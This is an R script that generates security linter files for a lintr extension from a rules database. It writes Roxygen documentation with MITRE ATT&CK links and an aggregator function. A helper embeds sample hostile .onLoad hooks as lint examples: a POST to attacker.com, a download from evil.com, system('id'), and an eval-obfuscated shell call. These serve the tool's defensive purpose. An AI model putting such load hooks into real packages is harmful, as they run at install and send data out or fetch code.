# data-raw/generate_linters.R
#
# Generates lintrsecurity R source files from the pkgaudit rules database.
#
# Run this script whenever the pkgaudit database changes to regenerate:
#   - R/<linter_name>.R          (one file per linter, with Roxygen2 documentation)
#   - R/lintrsecurity_linters.R  (aggregator function)
#   - inst/lintr/linters.csv     (lintr registration)
#
# Usage (from the lintrsecurity project root):
#   source("data-raw/generate_linters.R")
#   generate_linters()
#
# Requirements:
#   - pkgaudit must be installed
#   - The pkgaudit rules database must be present


# generate_linters ------------------------------------------------------------

#' Generate lintrsecurity source files from the pkgaudit rules database
#'
#' @param db_path      Path to the pkgaudit SQLite database. Defaults to the
#'   database bundled with the installed pkgaudit package.
#' @param r_dir        Directory to write generated linter R files. Defaults to
#'   the `R/` directory of the current project.
#' @param inst_dir     Directory to write `linters.csv`. Defaults to
#'   `inst/lintr/` of the current project.
#' @param pkgaudit_url URL of the pkgaudit pkgdown site, included in each
#'   linter's documentation as the reference for full vulnerability details.
generate_linters <- function(
  db_path      = system.file("db", "rules.db", package = "pkgaudit"),
  r_dir        = "R",
  inst_dir     = file.path("inst", "lintr"),
  pkgaudit_url = "https://tylerjssmith.github.io/pkgaudit"
) {
  con <- DBI::dbConnect(RSQLite::SQLite(), db_path)
  on.exit(DBI::dbDisconnect(con), add = TRUE)

  db_version <- DBI::dbGetQuery(
    con,
    "SELECT version FROM rule_versions ORDER BY released_at DESC LIMIT 1"
  )$version[[1L]]

  rules <- DBI::dbGetQuery(
    con,
    "SELECT name, xpath, message, type, tier, tags, attck, description
     FROM linters
     WHERE deprecated_in IS NULL
     ORDER BY name"
  )

  if (nrow(rules) == 0L) stop("No rules found in database.")

  message("Generating ", nrow(rules), " linters from pkgaudit version ",
          db_version, "...")

  dir.create(r_dir,    recursive = TRUE, showWarnings = FALSE)
  dir.create(inst_dir, recursive = TRUE, showWarnings = FALSE)

  generated_at <- format(Sys.time(), "%Y-%m-%dT%H:%M:%S")

  # Generate one R file per linter
  for (i in seq_len(nrow(rules))) {
    rule <- rules[i, ]
    path <- file.path(r_dir, paste0(rule$name, ".R"))
    writeLines(.linter_file(rule, db_version, generated_at, pkgaudit_url), path)
    message("  Wrote ", path)
  }

  # Generate aggregator
  agg_path <- file.path(r_dir, "lintrsecurity_linters.R")
  writeLines(.aggregator_file(rules$name, db_version, generated_at), agg_path)
  message("  Wrote ", agg_path)

  # Generate inst/lintr/linters.csv
  csv_path  <- file.path(inst_dir, "linters.csv")
  csv_lines <- c(
    "linter,tags",
    paste0(rules$name, ",", ifelse(is.na(rules$tags), "security", rules$tags))
  )
  writeLines(csv_lines, csv_path)
  message("  Wrote ", csv_path)

  message("Done. Run devtools::document() then devtools::check() to verify.")
  invisible(rules$name)
}


# --- Internal helpers ---------------------------------------------------------

.file_header <- function(db_version, generated_at) {
  c(
    "# Generated by data-raw/generate_linters.R -- do not edit by hand.",
    paste0("# Source: pkgaudit rules database version ", db_version),
    paste0("# Generated: ", generated_at),
    ""
  )
}

.attck_links <- function(attck_str) {
  if (is.na(attck_str) || !nzchar(attck_str)) return(NULL)
  ids   <- strsplit(trimws(attck_str), "\\s+")[[1L]]
  links <- vapply(ids, function(id) {
    url_path <- gsub("\\.", "/", sub("^T", "", id))
    url      <- paste0("https://attack.mitre.org/techniques/T", url_path, "/")
    paste0("[", id, "](", url, ")")
  }, character(1L))
  paste(links, collapse = ", ")
}

.example_code <- function(linter_name) {
  if (grepl("system",    linter_name)) return('.onLoad <- function(l, p) { system("id") }')
  if (grepl("httr_POST", linter_name)) return('.onLoad <- function(l, p) { httr::POST("https://attacker.com") }')
  if (grepl("download",  linter_name)) return('.onLoad <- function(l, p) { download.file("https://evil.com", "/tmp/p") }')
  if (grepl("eval",      linter_name)) return('.onLoad <- function(l, p) { eval(parse(text = "system(\'id\')")) }')
  '.onLoad <- function(l, p) { message("example") }'
}

.linter_file <- function(rule, db_version, generated_at, pkgaudit_url) {
  attck_links <- .attck_links(rule$attck)

  c(
    .file_header(db_version, generated_at),
    paste0("#' ", rule$description),
    "#'",
    "#' @details",
    paste0("#' **Lint message:** ", rule$message),
    "#'",
    paste0("#' **Severity:** `", rule$type, "`"),
    "#'",
    if (!is.null(attck_links)) c(paste0("#' **MITRE ATT\\&CK:** ", attck_links), "#'"),
    paste0("#' For full documentation of the targeted vulnerability, see the [pkgaudit documentation](", pkgaudit_url, ")."),
    "#'",
    "#' @return A linter function of class \\code{linter}.",
    "#'",
    "#' @examples",
    "#' \\dontrun{",
    "#' lintr::lint(",
    paste0("#'   text    = ", deparse(.example_code(rule$name)), ","),
    paste0("#'   linters = ", rule$name, "()"),
    "#' )",
    "#' }",
    "#'",
    "#' @export",
    paste0(rule$name, " <- function() {"),
    "  lintr::make_linter_from_xpath(",
    paste0("    xpath        = ", deparse(gsub("\\s+", " ", trimws(rule$xpath))), ","),
    paste0("    lint_message = ", deparse(rule$message), ","),
    paste0("    type         = ", deparse(rule$type)),
    "  )()",
    "}"
  )
}

.aggregator_file <- function(linter_names, db_version, generated_at) {
  n     <- length(linter_names)
  items <- paste0("    ", linter_names, " = ", linter_names, "()", c(rep(",", n - 1L), ""))

  c(
    .file_header(db_version, generated_at),
    "#' All lintrsecurity linters",
    "#'",
    "#' Returns all stable lintrsecurity linters as a named list suitable for",
    "#' passing to \\code{lintr::lint()} or \\code{lintr::lint_package()}.",
    "#'",
    "#' @return A named list of linter objects.",
    "#'",
    "#' @examples",
    "#' \\dontrun{",
    "#' lintr::lint_package(",
    "#'   linters = c(",
    "#'     lintr::linters_with_defaults(),",
    "#'     lintrsecurity::lintrsecurity_linters()",
    "#'   )",
    "#' )",
    "#' }",
    "#'",
    "#' @export",
    "lintrsecurity_linters <- function() {",
    "  list(",
    items,
    "  )",
    "}"
  )
}
